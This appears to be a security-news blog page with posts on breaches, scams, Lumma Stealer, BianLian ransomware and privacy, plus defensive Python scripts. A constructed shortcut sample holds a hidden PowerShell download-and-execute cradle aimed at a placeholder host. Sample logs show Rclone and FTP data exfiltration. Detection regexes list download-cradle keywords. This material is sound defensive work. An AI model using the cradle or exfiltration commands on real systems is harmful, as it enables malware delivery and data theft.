Showing posts with label User Safety.

An Unusual Tracking Feature Identified on Millions of iPhone Users

 

Millions of iPhone users around the world have discovered a new setting, "Discoverable by Others", that the latest software update switched on automatically. It sits under Journalling Suggestions in the Privacy & Security section of the iPhone's Settings. Journalling Suggestions arrived with the Journal app, which Apple launched with iOS 17.2 in December 2023.

When enabled, the feature draws on data already stored on the iPhone: music, photos, workouts, the people the user has called or texted, and significant locations. The Journal app uses this to suggest moments worth writing about.

The setting is on by default and stays on even if the user deletes the Journal app. According to Joanna Stern, senior personal technology columnist at The Wall Street Journal, Apple has confirmed that an iPhone can use Bluetooth to detect nearby devices belonging to people in the user's contacts. The phone does not store any information about which contacts were detected; the count is only used as context to improve Journalling Suggestions.

Apple also denies disclosing users' identities or locations to anyone. To illustrate, the company gave the example of hosting a dinner party at home with friends who are in your contacts: the system may rank that evening higher in Journalling Suggestions because the number of nearby contacts marks it as more than an ordinary night in with the family.

According to Apple's support page, turning off 'Discoverable by Others', so that your device is no longer counted by your contacts' phones, also turns off 'Prefer Suggestions with Others'. After that, Journalling Suggestions can no longer use the number of devices and contacts nearby when ranking suggestions. Users who never opened the Journal app should check the setting anyway, since deleting the app does not disable it.

Authorities Warn of AI Being Employed by Scammers to Target Canadians

 

As the use of artificial intelligence (AI) grows, fraudsters are employing it more often, and Canadians have noticed. In the Royal Bank of Canada's (RBC) annual Fraud Prevention Month poll, 75% of respondents said they are more concerned about fraud than ever before. Roughly nine in ten believe AI will increase scam attempts over the next year (88%) and make everyone more exposed to fraud (89%).

The survey also found that 81% of Canadians think AI will make phone scams harder to spot, and 81% are worried about scams that use voice cloning and impersonation.

"With the recent rise in voice cloning and deepfakes, fraudsters are able to employ a new level of sophistication to phone and online scams," stated Kevin Purkiss, vice president, Fraud Management, RBC. "The good news is that awareness of these types of scams is high, but we also need to take action to safeguard ourselves from fraudsters."

Phishing (generic scams by email or text), spear phishing (emails or texts crafted to look authentic) and vishing (targeted phone or voicemail scams) were the three types of fraud respondents encountered most. More than half (56%) report seeing more deepfake scams, and nearly half (47%) say voice cloning scams are on the rise.

Prevention tips

Set up alerts on your accounts, use multi-factor authentication wherever it is offered, and make the RBC Mobile App your primary banking channel. Watch for impersonation scams, in which fraudsters pose as a trusted source such as the government, bank staff, law enforcement or even a family member.

Some experts also recommend agreeing on a private code word with family members so you can confirm you are really speaking to them; a cloned voice can mimic a relative, but it will not know the word.

To stop robocallers from harvesting your identity or samples of your voice, limit what you post on social media and keep your voicemail greeting short and generic. Ignore or delete unsolicited emails and texts that ask for personal information, contain suspicious links or promise money.

Vans Warns Consumers of Fraudsters Following ALPHV Data Breach

 

Vans customers have been warned that they may be targeted for fraud or identity theft following an ALPHV ransomware attack on the brand's parent company.

Vans says VF Group detected "unauthorised activities" on part of its IT systems in December 2023, and that no passwords or detailed financial data were taken.

However, it also said that "it cannot be excluded" that the attackers will try to exploit the customer data they took. VF Group also owns The North Face, Dickies, Timberland and other brands.

In an email to customers, Vans said VF Group discovered the breach on December 13 and that it was "apparently carried out by external threat actors."

The company says it "immediately took steps" to contain the threat, including shutting down affected IT systems and bringing in cybersecurity experts, and that the intruders had been ejected by December 15.

"Our investigation revealed that the incident has affected some personal information of our customers that we normally store and process in order to manage online purchases, such as email address, full name, phone number, billing address, and shipping address," the email reads.

It added that the company does not "collect or retain" payment or financial data such as bank account or credit card details, so there was "no chance that any detailed financial information was exposed to the threat actors."

Vans said it was not aware of any customer having been harmed so far, but warned that the incident "may result in attempts at identity theft, phishing, and possibly fraud in general."

It urged customers to be wary of unexpected emails, texts and phone calls asking for personal information. The stolen fields (name, email, phone number, billing and shipping address) are exactly what a convincing order-related phishing message needs, so customers should treat any unsolicited contact that references a Vans purchase with suspicion. Vans says it has notified the relevant law enforcement agencies and will review its cybersecurity controls.

Beware of Malicious YouTube Channels Propagating Lumma Stealer

 

Attackers have been distributing a Lumma Stealer variant through YouTube channels that post videos about cracked versions of popular applications. They evade web filters by hosting the malware on widely used file-sharing platforms such as MediaFire and GitHub rather than on attacker-controlled servers, so the download URLs carry the reputation of a trusted domain.

According to FortiGuard researchers, the campaign resembles one uncovered in March last year that used artificial intelligence (AI) to produce step-by-step guides for installing unlicensed copies of Photoshop, Autodesk 3ds Max, AutoCAD and other programs.

"These YouTube videos typically feature content related to cracked applications, presenting users with similar installation guides and incorporating malicious URLs often shortened using services like TinyURL and Cuttly," Cara Lin, Fortinet senior analyst, wrote in a blog post. 

Modus operandi 

The attack begins with the attacker hijacking a YouTube account and uploading videos that promise tips for installing cracked software, with descriptions carrying malicious URLs. The descriptions lure viewers into downloading a .ZIP file containing the malicious content.

The videos Fortinet identified were uploaded earlier this year, but the files on the file-sharing site are refreshed regularly and the download counter keeps climbing, a sign that the campaign is reaching victims. "This indicates that the ZIP file is always new and that this method effectively spreads malware," Lin wrote.

The .ZIP file contains a .LNK shortcut that launches PowerShell to download a .NET executable from the GitHub project "New" belonging to the account John1323456. Two further repositories on the same account, "LNK" and "LNK-Ex", host .NET loaders that deliver Lumma as the final payload.

"The crafted installation .ZIP file serves as an effective bait to deliver the payload, exploiting the user's intention to install the application and prompting them to click the installation file without hesitation," Lin wrote.
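The dropper chain described above (a .LNK inside a ZIP that hands a download command to PowerShell) is what an analyst has to pull apart when triaging one of these archives. The script below is an added example, not Fortinet's code or anything recovered from the campaign. It parses the ShellLinkHeader and StringData fields of every .lnk in an archive following the MS-SHLLINK layout, joins the shortcut's target and arguments, and flags the entry when a script host is launched together with a download cradle or a URL. The archive, the shortcut contents and the URL https://files.example.com/New/loader.ps1 are all constructed for the demonstration; build_lnk() writes a stripped-down shortcut carrying only two string fields, whereas real droppers also carry an IDList and ExtraData, which parse_lnk() skips over or ignores.

```python
import io
import re
import struct
import zipfile

# ShellLinkHeader constants from MS-SHLLINK: fixed 76-byte header, then optional
# LinkTargetIDList, LinkInfo and up to five StringData fields, in this order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = (
    (0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
    (0x20, "arguments"), (0x40, "icon_location"),
)

# Indicators a triage analyst looks for in a shortcut's target and arguments.
LAUNCHER = re.compile(r"(?i)\b(powershell|pwsh|cmd|mshta|wscript|cscript|rundll32)\b")
CRADLE = re.compile(r"(?i)(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b|"
                    r"\bcurl\b|Start-BitsTransfer|\bIEX\b|Invoke-Expression|-enc\b|-EncodedCommand)")
URL = re.compile(r"(?i)https?://[^\s'\"()]+")


def parse_lnk(data: bytes) -> dict:
    """Decode the header flags and StringData of a .lnk file.

    Only the pieces needed for triage are parsed; ExtraData blocks are ignored.
    Raises ValueError if the header does not look like a shell link.
    """
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a shell link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_IDLIST:                     # skip IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                   # LinkInfoSize is the first field of LinkInfo
        pos += struct.unpack_from("<I", data, pos)[0]
    is_unicode = bool(flags & IS_UNICODE)
    fields = {"flags": flags}
    for bit, name in STRING_FIELDS:            # each string: CountCharacters, then the characters
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        size = count * 2 if is_unicode else count
        raw = data[pos:pos + size]
        pos += size
        fields[name] = raw.decode("utf-16-le" if is_unicode else "cp1252", errors="replace")
    return fields


def triage_zip(zip_bytes: bytes) -> list[dict]:
    """Inspect every .lnk inside an archive and flag those that launch a download cradle."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for entry in archive.infolist():
            if not entry.filename.lower().endswith(".lnk"):
                continue
            try:
                fields = parse_lnk(archive.read(entry))
            except ValueError as exc:
                findings.append({"entry": entry.filename, "verdict": "malformed", "detail": str(exc)})
                continue
            command = " ".join(fields.get(k, "") for k in ("relative_path", "working_dir", "arguments"))
            launcher = LAUNCHER.search(command)
            urls = URL.findall(command)
            suspicious = bool(launcher) and (bool(CRADLE.search(command)) or bool(urls))
            findings.append({
                "entry": entry.filename,
                "verdict": "suspicious" if suspicious else "benign",
                "launcher": launcher.group(1).lower() if launcher else None,
                "urls": urls,
                "arguments": fields.get("arguments", ""),
            })
    return findings


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Build a minimal Unicode .lnk carrying only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS.

    Used here to construct a sample; real droppers also carry an IDList and ExtraData.
    """
    flags = IS_UNICODE | 0x08 | 0x20
    header = struct.pack("<I16sI", LNK_HEADER_SIZE, LNK_CLSID, flags)
    header += b"\x00" * (LNK_HEADER_SIZE - len(header))
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (relative_path, arguments))
    return header + body


def sample_zip() -> bytes:
    """Constructed 'installer' archive: a readme, a dropper .lnk and a harmless .lnk (not a real sample)."""
    cradle = ("-w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('https://files.example.com/New/loader.ps1')\"")   # hypothetical URL
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        archive.writestr("Photoshop 2024/ReadMe.txt", "Run Setup to install.\n")
        archive.writestr("Photoshop 2024/Setup.lnk",
                         build_lnk(r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", cradle))
        archive.writestr("Photoshop 2024/Uninstall.lnk", build_lnk(r".\uninstall.exe", "/quiet"))
    return buf.getvalue()


if __name__ == "__main__":
    for finding in triage_zip(sample_zip()):
        print(finding["verdict"].upper(), finding["entry"], finding["urls"])
```

The verdict deliberately requires both a script host and a cradle or URL: a shortcut to powershell.exe alone is common in legitimate software, while a shortcut that also carries DownloadString and a remote URL has no business inside an "installer". Extending the check to decode -EncodedCommand payloads before matching is the obvious next step, since many droppers hide the cradle that way.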

The .NET loader is obfuscated with SmartAssembly, a legitimate commercial .NET obfuscator. The loader reads a value from the system environment and, only if it contains the expected number of entries, loads the PowerShell script; otherwise the process simply exits. A check like this lets the malware abort quietly when it is not running where the attacker expects, such as inside an analysis sandbox.

YouTube malware evasion and caution

The malware is built to evade detection. A ProcessStartInfo object launches the PowerShell process, which in turn loads a DLL for the next stage. That stage probes the environment in several ways to avoid analysis, looking for debuggers, security tools, sandboxes, virtual machines, and other services or files that could interfere with a malicious process.

"After completing all environment checks, the program decrypts the resource data and invokes the 'SuspendThread' function," Lin added. "This function is employed to transition the thread into a 'suspended' state, a crucial step in the process of payload injection."

Once running, Lumma contacts its command-and-control (C2) server and sends the stolen data back to the attackers in compressed form. Lin notes that the variant used in this campaign is version 4.0, but its exfiltration has been updated to use HTTPS, so the traffic blends in with ordinary encrypted web browsing and is harder to spot on the wire.

Infections can nevertheless be detected. Fortinet's write-up includes a list of indicators of compromise (IoCs) and a warning about "unclear application sources". Users should make sure that any application they download, whether found via YouTube or elsewhere, comes from a trustworthy source.

1.5 Billion Real Estate Records Leaked, Including Elon Musk and Kylie Jenner

 

Cybersecurity researcher Jeremiah Fowler discovered an exposed database belonging to Real Estate Wealth Network, a New York-based online business, and reported it through VPNMentor. The database held 1.5 billion records, including property ownership data on millions of people.

The 1.16 TB database (1,523,776,691 records) was organised into folders holding information on property owners, sellers and investors, plus internal user-tracking data. It also contained daily logs from 22 April to 23 October 2023 recording what internal users had searched for.

Cameron Dunlap founded Real Estate Wealth Network in 1993 to offer education and resources to real estate investors. Membership costs a one-time, non-refundable fee of $1,450 and gives access to a large data collection along with online courses, training materials, a community, and mentoring from experienced investors.

Upon further investigation, Fowler discovered that the exposed database contained the purported property ownership data of celebrities including Kylie Jenner, Blake Shelton, Britney Spears, Floyd Mayweather, Dave Chappelle, Elon Musk & Associates LLC, Dolly Parton, Donald J. Trump, Mark Wahlberg, and Nancy Pelosi. 

The online disclosure of celebrities' addresses could pose a number of threats, including concerns for their safety, invasion of privacy, stalking, and harassment by fans or malicious people. 

"The data was organised in various folders according to property history, motivated sellers, bankruptcy, divorce, tax liens, foreclosure, home owner association (HOA) liens, inheritance, court judgements, obituary (death), vacant properties, and more," VPNMentor’s blog post read. 

Everyone, famous or not, is exposed, because real estate tax data, which covers property ownership, assessed values, assessment history and tax payment history, lets criminals build a detailed profile of a property owner.

Threat actors can use the data to target individuals with social engineering or phishing aimed at extracting financial or other personal information. Records showing that someone bought a home for cash, has no mortgage, or has paid one off mark them out as worth targeting and raise the risk of financial fraud.

Property and mortgage fraud remain serious problems: the FBI recorded 11,578 incidents with $350 million in losses in a single year, a 20% increase from 2017. Property fraud typically involves stealing a homeowner's identity and forging ownership documents.

The database has since been closed to public access, and a Real Estate Wealth Network representative confirmed ownership, but how long it was exposed and whether anyone else reached it remain unknown. Only an internal forensic audit of access logs could determine whether the records were accessed, extracted or downloaded.

The incident is a clear warning of how readily accessible information can be turned to fraud. Property owners should be cautious about disclosing personal information, especially in response to unsolicited requests about their property, and should understand the risks that semi-public records carry for their assets.

Here's Why You Need To Protect Private Data Like It’s Currency

 

Data is the currency of the information age. We would all be better off if we treated data like money, because we would be far more careful about who we let hold it and who we share it with. Brick-and-mortar banks protect our money physically with alarm systems, guards and steel-walled vaults, which is why we are comfortable entrusting them with our savings.

Far too often, though, we trust third parties to hold our personal information without the data equivalent of alarms, guards and vaults. The businesses we trust with private data seem to stuff it under a digital mattress and hope nobody breaks in while they are out.

No data is more private or more valuable to us than our healthcare information, which makes it the most significant privacy risk in the United States today. The government both rewards healthcare providers for adopting electronic medical records and penalises those who do not. Authorised electronic sharing of patient information between doctors enables faster and more accurate treatment, ultimately saving lives and money.

But if the data cannot be protected, those benefits do not outweigh the risks. Policymakers assumed privacy could be regulated into existence and pushed the American healthcare system to digitise private information before it was able to secure it.

The mere possibility of a breach can deter people from seeking the care they need. One in eight patients, for example, compromises their health to protect their privacy, delaying early diagnosis and treatment or withholding important information. Fear of losing control of their privacy keeps millions from seeking medical help, particularly those with stigmatised conditions such as cancer, HIV/AIDS, other sexually transmitted diseases and depression.

Electronic medical records are supposed to benefit our health, but they are instead contributing to a loss of trust in the medical profession and ultimately a more unhealthy society. 

Mitigation tips

Numerous approaches have been developed to protect data from unauthorised access and tampering. Here are the three that matter most.

Encryption: A critical component of personal data security. Encryption converts sensitive information into ciphertext that is unintelligible to anyone who lacks the decryption key; only an authorised holder of the key can decode and read it.

It is used both for data in transit over the internet and for data at rest on devices such as laptops and mobile phones. Symmetric ciphers such as AES do the bulk encryption; asymmetric algorithms such as RSA are typically used to exchange or protect the AES keys rather than to encrypt the data itself. Together they make the data practically impossible for an unauthorised party to read, provided the keys are kept secure, which is the part that is usually hardest to get right.

Backup and recovery: Backups are an essential part of data security because they let you recover data after loss or corruption. By keeping copies in a secure location, a company can restore its data quickly after a disaster.

Many businesses use cloud-based storage services such as TitanFile as a secure, dependable place to store and restore data. Experts also recommend the 3-2-1 rule: keep three copies of your data, on two different types of storage media (for example the original device and an external drive), with one copy held off-site, such as in the cloud. The off-site copy should not be reachable with the same credentials as your everyday systems, so that an attacker who compromises them cannot delete the backup too.

Access control: Restricting access to sensitive information to the users who are authorised to see it. Passwords, multi-factor authentication and role-based access control all serve this end. Together they ensure that sensitive data is reached only by people with the right authorisation, reducing the risk of breaches and unauthorised access. The principle to apply is least privilege: grant each role only what its job requires, and deny everything else by default.
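To make the access-control point concrete, here is an added example, not code from the article, of a role-based check written the way the healthcare scenario above calls for. The roles, permissions and record identifiers are hypothetical. Any request without an explicit grant is denied (the function fails closed), ownership scoping lets a patient read only their own record, the system administrator role is deliberately given no clinical access, and writes require a session that has completed a second factor.

```python
from dataclasses import dataclass

# Role -> permissions, written as "resource:action". Anything not listed is denied.
# A ":self" suffix restricts the grant to records the user owns. (Hypothetical roles
# for a small clinical system, chosen to match the healthcare example in the text.)
ROLE_PERMISSIONS = {
    "patient":  {"record:read:self"},
    "nurse":    {"record:read"},
    "doctor":   {"record:read", "record:write"},
    "sysadmin": {"user:manage", "audit:read"},   # runs the system, never reads clinical data
}

# Actions that may only run in a session that has completed a second factor.
STEP_UP_REQUIRED = {"record:write", "user:manage"}


@dataclass(frozen=True)
class Session:
    user_id: str
    role: str
    mfa_verified: bool = False
    active: bool = True


@dataclass(frozen=True)
class Resource:
    kind: str       # e.g. "record"
    owner_id: str   # the patient the record belongs to


def is_allowed(session: Session, action: str, resource: Resource) -> tuple[bool, str]:
    """Decide whether `session` may perform `action` on `resource`.

    Returns (decision, reason). Every branch that grants access is explicit and
    the final fallthrough denies, so a missing rule fails closed rather than open.
    """
    if not session.active:
        return False, "session is not active"
    permissions = ROLE_PERMISSIONS.get(session.role)
    if permissions is None:
        return False, f"unknown role {session.role!r}"
    wanted = f"{resource.kind}:{action}"
    if wanted in STEP_UP_REQUIRED and not session.mfa_verified:
        return False, f"{wanted} requires a verified second factor"
    if wanted in permissions:
        return True, f"role {session.role} holds {wanted}"
    if f"{wanted}:self" in permissions and resource.owner_id == session.user_id:
        return True, f"owner of the {resource.kind}"
    return False, f"role {session.role} has no permission for {wanted}"


def decisions_for(resource: Resource, action: str, sessions: list[Session]) -> dict[str, bool]:
    """Evaluate one request for several sessions; handy for reviewing a policy as a table."""
    return {s.user_id: is_allowed(s, action, resource)[0] for s in sessions}


if __name__ == "__main__":
    chart = Resource("record", owner_id="pat-001")
    for who in (Session("dr-1", "doctor", mfa_verified=True), Session("dr-1", "doctor"),
                Session("nurse-7", "nurse"), Session("pat-001", "patient"),
                Session("pat-002", "patient"), Session("ops-3", "sysadmin", mfa_verified=True)):
        for action in ("read", "write"):
            print(who.user_id, who.role, action, *is_allowed(who, action, chart))
```

Returning the reason alongside the decision is deliberate: it is what you log for audit, and it makes policy reviews (who can write to a record and why) answerable from the code rather than from memory.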

Mozilla Report Calls Modern Cars a 'Privacy Nightmare'

 

Modern car technology enables some genuinely useful conveniences; today's cars are essentially smartphones on four wheels. As handy as it is to start a car from a phone app or have it park itself, there is a downside.

The Mozilla Foundation claimed in its latest report that cars are "the official worst category of products for privacy" it has ever analysed. 

The global nonprofit found that 84% of the car brands it reviewed share user data with third parties, leaving owners little (if any) control over their personal information.

None of the 25 car brands examined met the nonprofit's minimum privacy standards, including Ford, Toyota, Volkswagen, BMW and Tesla, and all of them were found to collect more personal information from customers than necessary.

The data collected ranges from personal details, including medical information, to how drivers use the car itself: how fast they drive, where they go, and even what music they listen to.

Nissan's and Kia's privacy policies both state that they may collect data about a user's sexual activity. By comparison, Mozilla says 37% of the mental health apps it has reviewed (a category itself notorious for poor privacy practices) had better practices for collecting and using personal data than cars.

According to the report, 84% of the car brands evaluated share users' personal information with service providers, data brokers and other businesses of uncertain reputation; 76% say they may sell that information; and 56% say they will hand it over to government and/or law enforcement on request.

Tesla received the lowest overall score in the survey, with warning flags in every privacy category, only the second product in Mozilla's reviews ever to fail across the board. Its AI-powered Autopilot was rated "untrustworthy" following a number of collisions and fatalities.

Alongside the research, Mozilla published a breakdown of how car makers collect and share user data. It can include basic details such as name, address, phone number and email, as well as more sensitive information such as photos, calendar entries, and even a driver's race, genetic information and immigration status.

Mozilla says it could not confirm whether any of the car makers met its minimum security standards, such as encrypting the personal data they collect and protecting it against theft. It notes that dating apps and even sex toys often publish more thorough security information than car companies do.

“While we worried that our doorbells and watches that connect to the internet might be spying on us, car brands quietly entered the data business by turning their vehicles into powerful data-gobbling machines,” stated Mozilla in the report. 

Mozilla says it spent more than 600 hours researching car makers' privacy policies, three times as long per product as it usually does. It added that the findings were so poor that the advice it normally gives consumers to protect their data feels like "tiny drops in a massive bucket."

Instead, the Mozilla Foundation has launched a petition asking car makers to stop the data collection they are unfairly profiting from, saying that "our hope is that increasing awareness will encourage others to hold car companies accountable for their terrible privacy practices."

Apple Seeks to Defuse a French iPhone 12 Issue as EU Inquiry Intensifies

 

Apple pledged on Friday to update the software on iPhone 12 handsets in France to settle a dispute over radiation levels, but concerns raised in other European countries suggested it may have to take similar steps elsewhere.

France suspended sales of iPhone 12 phones this week after tests revealed violations of radiation exposure regulations.

Apple disputed the findings, saying the iPhone 12 had been certified by numerous international bodies as meeting all applicable global standards, but announced on Friday that it would issue a software update to accommodate the French testing protocol.

Numerous studies over the past two decades have assessed the health effects of mobile phones. The World Health Organisation says there is no evidence that they cause any adverse health effects. Still, the French warning, which rested on test results that differed from those of other countries, has raised concerns across Europe.

Belgium's state secretary for digitalisation said he had asked Apple to update the iPhone 12's software across the EU, even though the Belgian regulator's own preliminary analysis found the device poses no risk to consumers.

Italy was preparing to ask Apple to update the software on iPhone 12s there, a government source in Rome said, while Germany said it was in contact with the French authorities to seek an EU-wide solution. A second Italian government source said officials would wait for the French investigation to conclude before making any request of Apple or acting independently.

The Dutch Authority for Digital Infrastructure said it is in contact with Apple and with the German and French authorities, and is conducting its own inquiry, due in two weeks. It said it had received calls from worried consumers.

The French authorities welcomed Apple's update, saying it would be tested quickly and, if it passes, would allow sales of the iPhone 12, a relatively old model released in 2020, to resume.

"We will issue a software update for users in France to accommodate the protocol used by French regulators. We look forward to iPhone 12 continuing to be available in France," Apple stated. "This is related to a specific testing protocol used by French regulators and not a safety concern."

BianLian Ransomware Gang Siphons 6.8TB of Data from Save The Children

 

Save the Children, one of the world's largest and oldest charities, has confirmed it was the victim of a ransomware attack by the BianLian operation. The attack came to light on Monday, September 11, when details were posted on the gang's leak site.

The attack was first spotted by VX Underground and by Emsisoft's Brett Callow. VX Underground said the gang needed "to be punched in the face", a sentiment that is hard to argue with.

BianLian did not name Save the Children at first, instead claiming to have hit "the world's leading non-profit organisation, employing around 25,000 staff and operating in 116 countries" with $2.8 billion in revenue.

Parts of that description match the charity's own boilerplate, but BianLian's figure for its finances appears wildly off: Save the Children's total revenue in 2022 was £294m.

The gang claims to have stolen 6.8TB of data, including 800GB of financial records, human resources data, and personal information about individuals, including health and medical records and email correspondence.

Little is known about the BianLian ransomware gang. Its name refers to a style of Chinese opera from Sichuan Province, but the group is far more likely to be Russian-speaking. It was one of many crews that emerged in 2022, rising around the same time as Black Basta, Hive and Alphv/BlackCat, and has established itself as a successful criminal operation.

It is among the ransomware groups that, as of 2023, have moved away from encrypting victims' data and instead simply steal it and demand payment in return for a promise not to publish it. That shift means good backups alone are no longer a sufficient defence; stopping the initial access and catching the exfiltration matter more.

According to the US Cybersecurity and Infrastructure Security Agency (CISA), BianLian typically gains access to victims' systems with valid Remote Desktop Protocol (RDP) credentials and uses a range of open source tools and command-line scripting for credential harvesting.

It exfiltrates data in several ways, most commonly over File Transfer Protocol (FTP), with the Rclone synchronisation tool, or through legitimate cloud storage such as Mega. To pressure victims, it prints its ransom note on printers across the victim's network, and staff at affected companies have reported threatening phone calls from people claiming to be members of the group.
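The CISA description above (valid RDP credentials for access, then FTP, Rclone or Mega for exfiltration) translates directly into detection logic. The script below is an added example, not CISA's or any vendor's rule set. It runs three checks over constructed sample telemetry: an RDP logon (logon type 10) from a non-private address, an Rclone copy or sync to a configured remote (matching on the OriginalFileName field so a renamed binary is still caught), and a scripted ftp.exe session. The event format, field names and sample lines are assumptions modelled loosely on Windows Security 4624 events and Sysmon Event ID 1 process creations; adapt the field mapping to your own pipeline.

```python
import ipaddress
import json
import ntpath
import re

# Constructed sample telemetry (not real logs): Windows Security 4624 logons and
# Sysmon Event ID 1 process creations, one JSON object per line.
SAMPLE_EVENTS = r"""
{"EventID": 4624, "LogonType": 10, "TargetUserName": "svc_backup", "IpAddress": "203.0.113.25", "UtcTime": "2023-09-08 02:14:07"}
{"EventID": 4624, "LogonType": 10, "TargetUserName": "jdoe", "IpAddress": "10.20.5.14", "UtcTime": "2023-09-08 09:01:33"}
{"EventID": 1, "Image": "C:\\ProgramData\\svchost.exe", "OriginalFileName": "rclone.exe", "CommandLine": "svchost.exe copy \"D:\\Finance\" mega:backup --transfers 16 -q", "User": "CORP\\svc_backup", "UtcTime": "2023-09-08 02:31:49"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\ftp.exe", "OriginalFileName": "ftp.exe", "CommandLine": "ftp -s:C:\\Users\\Public\\up.txt 198.51.100.7", "User": "CORP\\svc_backup", "UtcTime": "2023-09-08 03:02:11"}
{"EventID": 1, "Image": "C:\\Program Files\\7-Zip\\7z.exe", "OriginalFileName": "7z.exe", "CommandLine": "7z a D:\\HR\\hr.7z D:\\HR", "User": "CORP\\jdoe", "UtcTime": "2023-09-08 09:05:00"}
"""

PRIVATE_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
RCLONE_VERB = re.compile(r"(?i)\b(copy|copyto|sync|move|moveto)\b")
# rclone addresses a configured remote as "name:path"; exclude Windows drive letters such as C:\
RCLONE_REMOTE = re.compile(r"(?<![\w:\\])([A-Za-z][\w-]*):(?![\\/])")
FTP_SCRIPT = re.compile(r"(?i)\s-s:")


def is_external(addr: str) -> bool:
    """True for a routable address outside the RFC 1918 and loopback ranges."""
    try:
        ip = ipaddress.ip_address(addr)
    except ValueError:
        return False
    return not any(ip in net for net in PRIVATE_NETS)


def detect(event: dict) -> list[str]:
    """Return zero or more alert strings for one event."""
    alerts = []
    if event.get("EventID") == 4624 and event.get("LogonType") == 10 and is_external(event.get("IpAddress", "")):
        alerts.append(f"RDP logon by {event['TargetUserName']} from external address {event['IpAddress']}")
    if event.get("EventID") == 1:
        image = ntpath.basename(event.get("Image", "")).lower()
        original = event.get("OriginalFileName", "").lower()
        cmd = event.get("CommandLine", "")
        user = event.get("User", "?")
        if "rclone.exe" in (image, original):          # OriginalFileName survives a rename on disk
            verb = RCLONE_VERB.search(cmd)
            remotes = RCLONE_REMOTE.findall(cmd)
            if verb and remotes:
                renamed = f" (binary renamed to {image})" if image != original else ""
                alerts.append(f"rclone {verb.group(1).lower()} to remote {','.join(remotes)} by {user}{renamed}")
        elif image == "ftp.exe" and FTP_SCRIPT.search(cmd):
            alerts.append(f"scripted FTP session by {user}: {cmd}")
    return alerts


def scan(lines: str) -> list[tuple[str, str]]:
    """Run detect() over JSON-lines telemetry; returns (timestamp, alert) pairs in log order."""
    hits = []
    for line in lines.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits.extend((event.get("UtcTime", ""), alert) for alert in detect(event))
    return hits


if __name__ == "__main__":
    for when, alert in scan(SAMPLE_EVENTS):
        print(when, alert)
```

On the sample, the three alerts line up on one account within an hour: an external RDP logon as svc_backup, a renamed Rclone pushing a finance share to a Mega remote, then a scripted FTP upload. That sequence, rather than any single event, is what distinguishes an intrusion from a backup job, so the alerts are worth correlating by user and time window rather than triaging individually.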

Vishing Scams: Here's How to Spot & Defend Against Them

 

Vishing (voice or VoIP phishing) is a type of cyber attack that uses voice calls and telephony to trick targets into disclosing sensitive information to unauthorized parties. 

The information may be personal, such as a Social Security number or financial account details, or related to a business: fraudsters might use vishing to talk an employee into handing over network access details, for example.

In 2022, "38% of the reports submitted to the FTC by consumers ages 80+ indicated phone calls as the initial contact method. (Calls were the most popular mode of contact for this age group.)" according to Ally Armeson, executive program director of the Cybercrime Support Network.

"Vishing, also known as voice phishing," Armeson continues, "is a growing threat in the world of cybercrime, particularly targeting the elderly."  

The scam exploits older people's greater tendency to trust a phone call, with callers impersonating charities, posing as relatives, or claiming to be from trusted institutions such as government agencies. 

The result is often the disclosure of credit card details, Social Security numbers, login credentials or other valuable data.

How to defend yourself?

  • Confirm the caller's identity independently: look up the organization's number on its own website and call back on that number rather than one the caller gives you.
  • Never give out personal or financial information over the phone. Legitimate organizations will not ask for credit card numbers, Social Security numbers or passwords.
  • Don't hesitate to question the legitimacy of an unknown number, and be wary of sharing anything important before you have verified who is calling.
  • Caller ID is easily spoofed, so don't rely on it alone to decide whether a call is genuine. I recommend remaining attentive and exercising caution while disclosing sensitive information.
  • Let unknown callers go to voicemail so you can screen the call. Report unusual calls or suspected fraud to the FTC at ReportFraud.ftc.gov.
  • In general, do not give out financial or Social Security information over the phone, by text or by email.  
By following these tips, you can help protect yourself from vishing scams.

Here's How Hackers Sell and Trade Your Data in the Metaverse

 

Your data might be lost in the metaverse, a place where reality takes on new forms and lovely virtual landscapes arise. 

Imagine yourself in a bustling digital marketplace, surrounded by avatars dressed in the latest digital attire. A secret underground network is concealed in the metaverse's shadowy side while you're taking in all the sights and sounds. Here, data sellers and hackers can be found together, chatting about the most recent hacks and online theft. 

Darkverse: A flip side of metaverse

If you're not sure what the darkverse is, think of the wild west of the digital world; it's a place where wicked acts flourish in the absence of law. Cybercriminals, hackers, and other malicious actors dwell in this shadowy domain and operate outside the bounds of morality and the law, significantly jeopardising the stability and security of the metaverse. 

Identity theft, fraud, and data breaches are commonplace in the darkverse, preying on unsuspecting users who take a chance in this dangerous environment. Automated bots roam freely, spamming and deceiving innocent users, while cutting-edge AI and deepfake technology generate fake data, obscuring a matter of truth and reliability. 

What type of data is sold on metaverse? 

Cybercriminals have adapted to this environment by selling all forms of stolen data to the highest bidders, and metaverse data marketplaces are similarly active. Personal data, which can include your name, address, phone number, and other information, comes first on the list. 

Identity theft is common in the metaverse, as malicious actors might adopt your online persona for profit or other reasons. So, before you go in, it's useful to learn about the most common metaverse crimes. 

Another noticeable commodity is financial data. Credit card information, bank account information, and digital wallets are highly sought after because cybercriminals can use this information to conduct unauthorised transactions, depleting victims' accounts in the blink of an eye. 

